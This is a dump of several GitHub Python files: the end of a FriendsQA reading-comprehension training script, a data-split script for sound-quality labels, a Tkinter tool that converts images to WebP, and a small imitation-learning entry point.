outputs[0]\r\n if args.add_speaker_mask:\r\n b_correct_num, b_all_num = outputs[1]\r\n correct_num += b_correct_num\r\n all_num += b_all_num\r\n for qid, ans_record in answer_list:\r\n real_qid = qid.split('-')[0]\r\n offset = int(qid.split('-')[1])\r\n ans_record['span_pred_uid'] += offset\r\n if 'model_pred_uid' in ans_record.keys(): ans_record['model_pred_uid'] += offset\r\n if real_qid not in answer_dict.keys():\r\n answer_dict[real_qid] = ans_record\r\n else:\r\n cur_best_prob = answer_dict[real_qid]['prob']\r\n if ans_record['prob'] > cur_best_prob:\r\n answer_dict[real_qid] = ans_record\r\n # computing utterance matching (UM)\r\n assert len(answer_dict) == len(target_uids_dict)\r\n all_example_num, model_pred_correct_num, span_um_num = len(answer_dict), 0, 0\r\n for qid, target_uids in target_uids_dict.items():\r\n ans_record = answer_dict[qid]\r\n span_um_num += 1 if ans_record['span_pred_uid'] in target_uids else 0\r\n if 'model_pred_uid' in ans_record.keys():\r\n model_pred_correct_num += 1 if ans_record['model_pred_uid'] in target_uids else 0\r\n model_um = model_pred_correct_num / all_example_num\r\n span_um = span_um_num / all_example_num\r\n\r\n # computing f1 and em using the official SQuAD script\r\n answer_dict = {qid: ans_record['answer_text'] for qid,
ans_record in answer_dict.items()}\r\n with open(args.pred_file, \"w\") as f:\r\n json.dump(answer_dict, f, indent=2)\r\n if args.add_speaker_mask:\r\n print(\"Speaker prediction acc: %.5f\" % (correct_num / all_num))\r\n evaluate_options = EVAL_OPTS(data_file=test_path if is_test else eval_path,\r\n pred_file=args.pred_file,\r\n na_prob_file=None)\r\n res = evaluate_on_squad(evaluate_options)\r\n em = res['exact']\r\n f1 = res['f1']\r\n rtv_dict = {'em': em, 'f1': f1, 'um': span_um, 'model_um': model_um}\r\n model.train()\r\n\r\n return rtv_dict\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(args.model_type)\r\n set_seed()\r\n MRCModel = MRC_MODEL_LIST[args.model_num].MRCModel\r\n print(\"model:\", MRC_MODEL_LIST[args.model_num])\r\n\r\n tokenizer = tokenizer_class.from_pretrained(args.model_name)\r\n config = config_class.from_pretrained(args.model_name)\r\n if args.model_type != 'xlnet':\r\n config.start_n_top = 5\r\n config.end_n_top = 5\r\n\r\n # create datasets\r\n train_dataset = get_dataset(train_path, args.cache_path, \\\r\n tokenizer, args.max_length, training=True)\r\n eval_dataset = get_dataset(eval_path, args.cache_path, \\\r\n tokenizer, args.max_length, training=False)\r\n test_dataset = get_dataset(test_path, args.cache_path, \\\r\n tokenizer, args.max_length, training=False)\r\n\r\n train_sampler = RandomSampler(train_dataset)\r\n\r\n train_dataloader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args.batch_size,\r\n collate_fn=collate_fn)\r\n\r\n eval_sampler = SequentialSampler(eval_dataset)\r\n eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.batch_size, collate_fn=collate_fn)\r\n test_sampler = SequentialSampler(test_dataset)\r\n test_dataloader = DataLoader(test_dataset, sampler=test_sampler, batch_size=args.batch_size, collate_fn=collate_fn)\r\n\r\n model = MRCModel.from_pretrained(args.model_name, config=config)\r\n\r\n if hasattr(model, 'load_mha_params'):\r\n print(\"Loading multi-head attention parameters from pretrained model...\")\r\n model.load_mha_params()\r\n print(\"===========================================\")\r\n if os.path.exists(pretrained_model_path):\r\n # if True:\r\n # load checkpoint on SQuAD\r\n model.load_state_dict(torch.load(pretrained_model_path), strict=False)\r\n print(\"=\" * 10 + \"load pretrained model\" + \"=\" * 10)\r\n model = model.to(device)\r\n train(model, train_dataloader, eval_dataloader, test_dataloader, tokenizer)\r\n else:\r\n print(\"Please run train_squad first.\")\r\n\r\n model = model.to(device)\r\n load_checkpoint = True\r\n if load_checkpoint:\r\n model.load_state_dict(torch.load(model_save_path))\r\n print(\"=\" * 10 + \"load checkpoint\" + \"=\" * 10)\r\n # eval\r\n print(\"=\" * 10 + \"start evaluation\" + \"=\" * 10)\r\n with torch.no_grad():\r\n eval_result = evaluate(model, eval_dataloader, tokenizer, is_test=False)\r\n test_result = evaluate(model, test_dataloader, tokenizer, is_test=True)","repo_name":"xyzhu20/Memory-Network-with-Logistic-Inference","sub_path":"FriendsQA/train_friendsqa.py","file_name":"train_friendsqa.py","file_ext":"py","file_size_in_byte":12758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31247361761","text":"import numpy as np\nimport random\nimport pickle\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split, StratifiedShuffleSplit\n\n# dimension order: [timbre, pitch, dynamics, richness, attack]\n\ntest_size = 0.2\n\nfeature_all, label_all 
= pickle.load(open('dataset/allData.pkl', 'rb'))\n\nlabel_timbre_all = [label_single_sound[0] for label_single_sound in label_all]\nlabel_pitch_all = [label_single_sound[1] for label_single_sound in label_all]\nlabel_dynamics_all = [label_single_sound[2] for label_single_sound in label_all]\nlabel_richness_all = [label_single_sound[3] for label_single_sound in label_all]\nlabel_attack_all = [label_single_sound[4] for label_single_sound in label_all]\n\nprint('total sample size:')\nprint(len(label_timbre_all))\n\nprint('bad sample size:')\nprint(len([ii for ii in label_timbre_all if ii == 0]))\n\ndef splitFromLabel(sss, label_all):\n \"\"\"\n split features to train and test sets and return indices\n :param sss:\n :param label_all:\n :return:\n \"\"\"\n for train_index, test_index in sss.split(feature_all, label_all):\n print(len(train_index))\n print(len(test_index))\n X_train = [feature_all[tpi] for tpi in train_index]\n y_train = [label_all[tpi] for tpi in train_index]\n\n X_test = [feature_all[tpi] for tpi in test_index]\n y_test = [label_all[tpi] for tpi in test_index]\n\n return X_train, X_test, y_train, y_test, train_index, test_index\n\ndef featureScaling(X_train, X_test):\n \"\"\"\n Scaling features by X_train\n :param X_train:\n :param X_test:\n :return:\n \"\"\"\n X_train_concat = np.concatenate(X_train, axis=0)\n print(X_train_concat.shape)\n\n scaler = preprocessing.StandardScaler()\n scaler.fit(X_train_concat)\n\n for ii in xrange(len(X_train)):\n X_train[ii] = scaler.transform(X_train[ii])\n\n for ii in xrange(len(X_test)):\n X_test[ii] = scaler.transform(X_test[ii])\n\n return X_train, X_test, scaler\n\ndef saveTestScaler(X_test, y_test, train_index, scaler, feature_string):\n pickle.dump((X_test, y_test), open('./dataset/testData_'+feature_string+'.pkl', 'wb'))\n pickle.dump(scaler, open('./dataset/scaler_'+feature_string+'_train.pkl', 'wb'))\n pickle.dump(train_index, open('./dataset/trainIndex_'+feature_string+'.pkl', 'wb'))\n\nsss = StratifiedShuffleSplit(n_splits=1, test_size=test_size, random_state=0)\n\n# sss.get_n_splits(feature_all, label_timbre_all)\n# for train_timbre_index, test_timbre_index in sss.split(feature_all, label_timbre_all):\n# print(train_timbre_index)\n# print(test_timbre_index)\n\nprint('timbre')\nsss.get_n_splits(feature_all, label_timbre_all)\nX_timbre_train, X_timbre_test, y_timbre_train, y_timbre_test, train_timbre_index, test_timbre_index = splitFromLabel(sss, label_timbre_all)\n_, X_timbre_test, scaler_timbre_train = featureScaling(X_timbre_train, X_timbre_test)\nsaveTestScaler(X_timbre_test, y_timbre_test, train_timbre_index, scaler_timbre_train, 'timbre')\n\n# # pitch\n# print('pitch')\n# sss.get_n_splits(feature_all, label_pitch_all)\n# X_pitch_train, X_pitch_test, y_pitch_train, y_pitch_test, train_pitch_index, test_pitch_index = splitFromLabel(sss, label_pitch_all)\n# _, X_pitch_test, scaler_pitch_train = featureScaling(X_pitch_train, X_pitch_test)\n# saveTestScaler(X_pitch_test, y_pitch_test, train_pitch_index, scaler_pitch_train, 'pitch')\n#\n# # dynamics\n# print('dynamics')\n#\n# sss.get_n_splits(feature_all, label_dynamics_all)\n# X_dynamics_train, X_dynamics_test, y_dynamics_train, y_dynamics_test, train_dynamics_index, test_dynamics_index = splitFromLabel(sss, label_dynamics_all)\n# _, X_dynamics_test, scaler_dynamics_train = featureScaling(X_dynamics_train, X_dynamics_test)\n# saveTestScaler(X_dynamics_test, y_dynamics_test, train_dynamics_index, scaler_dynamics_train, 'dynamics')\n#\n# # richness\n# print('richness')\n#\n# 
sss.get_n_splits(feature_all, label_richness_all)\n# X_richness_train, X_richness_test, y_richness_train, y_richness_test, train_richness_index, test_richness_index = splitFromLabel(sss, label_richness_all)\n# _, X_richness_test, scaler_richness_train = featureScaling(X_richness_train, X_richness_test)\n# saveTestScaler(X_richness_test, y_richness_test, train_richness_index, scaler_richness_train, 'richness')\n#\n# # attack\n# print('attack')\n#\n# sss.get_n_splits(feature_all, label_attack_all)\n# X_attack_train, X_attack_test, y_attack_train, y_attack_test, train_attack_index, test_attack_index = splitFromLabel(sss, label_attack_all)\n# _, X_attack_test, scaler_attack_train = featureScaling(X_attack_train, X_attack_test)\n# saveTestScaler(X_attack_test, y_attack_test, train_attack_index, scaler_attack_train, 'attack')\n\n\n# X_timbre_train, X_timbre_test, y_timbre_train, y_timbre_test = \\\n# train_test_split(feature_all, label_timbre_all, test_size=test_size, stratify=label_timbre_all)\n#\n# print(len(X_timbre_train), len(X_timbre_test), len(y_timbre_train), len(y_timbre_test))\n# print(X_timbre_train[0].shape)\n\n\n# X_timbre_train, X_timbre_test, scaler = featureScaling(X_timbre_train, X_timbre_test)\n#\n# pickle.dump(scaler, open('./dataset/scaler_timbre_train.pkl', 'wb'))\n# pickle.dump((X_timbre_train, y_timbre_train), open('./dataset/trainData_timbre.pkl', 'wb'))\n# pickle.dump((X_timbre_test, y_timbre_test), open('./dataset/testData_timbre.pkl', 'wb'))","repo_name":"ronggong/goodsoundsEvaluator","sub_path":"trainingDataPrepSingleDim.py","file_name":"trainingDataPrepSingleDim.py","file_ext":"py","file_size_in_byte":5327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4917520719","text":"import ctypes\nimport sys\nimport os\nimport tkinter as tk\nfrom tkinter import filedialog, simpledialog\nfrom PIL import Image\n\ndef set_console_title():\n ctypes.windll.kernel32.SetConsoleTitleW(\"Opti-WebP\")\n\ndef display_initial_message():\n print(\"Opti-WebP - Image Optimization Tool\")\n print(\"Opti-WebP will bulk resize, compress and convert non WebP images to an optimized WebP final version.\")\n print(\"Created by John Large aka bloom\")\n print(\"Website: https://studiobloom.xyz\")\n print(\"If this tool helps you, please consider donating:\\n$studiobloomxyz on cash app, paypal.me/studiobloomxyz\\nBTC @ 33bhGfzcKekYh8oB31Jzv5FYUkdahyC3eA\\nETH @ 0xD974b9ab6e897d1128F2aFe98Aa172dE8180D27E\")\n print(\"\\n\\n\")\n print(\"Choose the directory of the image(s) to be optimized.\\nProceed through the following window prompts.\")\n\ndef select_directory():\n root = tk.Tk()\n root.withdraw()\n directory = filedialog.askdirectory()\n return directory\n\ndef get_icon_path():\n if hasattr(sys, '_MEIPASS'):\n return os.path.join(sys._MEIPASS, 'opti-webp.ico')\n else:\n return os.path.join(os.path.dirname(os.path.abspath(__file__)), 'opti-webp.ico')\n\nclass MaxDimensionSizeDialog(tk.Toplevel):\n def __init__(self, parent):\n super().__init__(parent)\n self.title(\"Max Dimension Size\")\n self.iconbitmap(get_icon_path())\n self.geometry(\"300x250\")\n self.resizable(False, False)\n\n self.max_dimension_size = None\n self.create_widgets()\n\n def create_widgets(self):\n label = tk.Label(self, text=\"Limit max width/height of image(s).\\nAspect Ratio will remain locked.\\n(between 500px-4000px is suggested)\\nEnter the maximum dimension size:\")\n label.pack(pady=10)\n\n self.entry = tk.Entry(self)\n self.entry.pack()\n\n 
button = tk.Button(self, text=\"OK\", command=self.set_max_dimension_size)\n button.pack(pady=10)\n \n def set_max_dimension_size(self):\n try:\n self.max_dimension_size = int(self.entry.get())\n except ValueError:\n pass\n self.destroy()\n \ndef get_max_dimension_size():\n root = tk.Tk()\n root.withdraw()\n dialog = MaxDimensionSizeDialog(root)\n root.wait_window(dialog)\n return dialog.max_dimension_size\n\ndef count_images(directory):\n image_count = sum([filename.lower().endswith((\".png\", \".jpg\", \".jpeg\", \".gif\", \".bmp\", \".heic\", \".tiff\", \".tif\")) for filename in os.listdir(directory)])\n print(f\"Optimizable Images found in directory: {image_count}\")\n return image_count\n\ndef resize_and_convert(directory, max_dimension_size):\n image_count = count_images(directory)\n if image_count == 0:\n print(\"No optimizable images found.\")\n return\n\n print(f\"Processing images in directory: {directory}\")\n for filename in os.listdir(directory):\n try:\n if filename.lower().endswith((\".png\", \".jpg\", \".jpeg\", \".gif\", \".bmp\", \".heic\", \".tiff\", \".tif\")):\n print(f\"Processing image: {filename}\")\n img = Image.open(os.path.join(directory, filename))\n img.thumbnail((max_dimension_size, max_dimension_size))\n\n # Save as PNG\n new_filename = os.path.splitext(filename)[0] + \"_resized.png\"\n img.save(os.path.join(directory, new_filename), \"PNG\", optimize=True)\n print(f\"Saved resized image as: {new_filename}\")\n\n # Convert to WebP\n webp_filename = os.path.splitext(filename)[0] + \".webp\"\n img.save(os.path.join(directory, webp_filename), \"WEBP\")\n print(f\"Converted image to WebP: {webp_filename}\")\n\n # Delete resized PNG file\n os.remove(os.path.join(directory, new_filename))\n print(f\"Deleted resized image: {new_filename}\")\n\n except Exception as e:\n print(f\"An error occurred while processing image {filename}: {e}\")\n\nif __name__ == \"__main__\":\n set_console_title()\n display_initial_message()\n directory = select_directory()\n if directory:\n max_dimension_size = get_max_dimension_size()\n if max_dimension_size:\n resize_and_convert(directory, max_dimension_size)\n \n # Keep the command window open and prompt the user to restart\n while True:\n user_input = input(\"Your conversion is now complete, thank you for using Opti-WebP:)\\nType 'r' to run the script again, or press enter to exit:\")\n if user_input.lower() == \"r\":\n set_console_title()\n directory = select_directory()\n if directory:\n max_dimension_size = get_max_dimension_size()\n if max_dimension_size:\n resize_and_convert(directory, max_dimension_size)\n else:\n break\n","repo_name":"studiobloom/opti-webp","sub_path":"opti-webp.py","file_name":"opti-webp.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"6726230919","text":"import argparse\nimport sys\n\nfrom train import *\n\n\ndef main():\n sys.path.append(\"../\")\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--history_length\", default=1)\n parser.add_argument(\"--save\", default=True)\n parser.add_argument(\"--batch_size\", default=64)\n parser.add_argument(\"--epochs\", default=3)\n parser.add_argument(\"--lr\", default=1e-4)\n parser.add_argument(\"--study_name\", default=\"training\")\n args = parser.parse_args()\n if args.save:\n print(f\"Reading Data\")\n data = read_data(\"./data\")\n print(f\"Image count {data[0].shape[0]}\")\n print(f\"Preprocessing\")\n train_data, validation, weights = 
preprocessing(*data, bool(args.save), int(args.history_length))\n else:\n print(f\"Reading Data\")\n train_data = torch.load(\"./data/training\")\n validation = torch.load(\"./data/validation\")\n weights = torch.load(\"./data/sample_weight\")\n print(f\"Training\")\n train_model(train_data, validation, weights, int(args.batch_size), int(args.epochs), float(args.lr),\n args.study_name, history_length=int(args.history_length))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aselimc/Imitation_Learning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}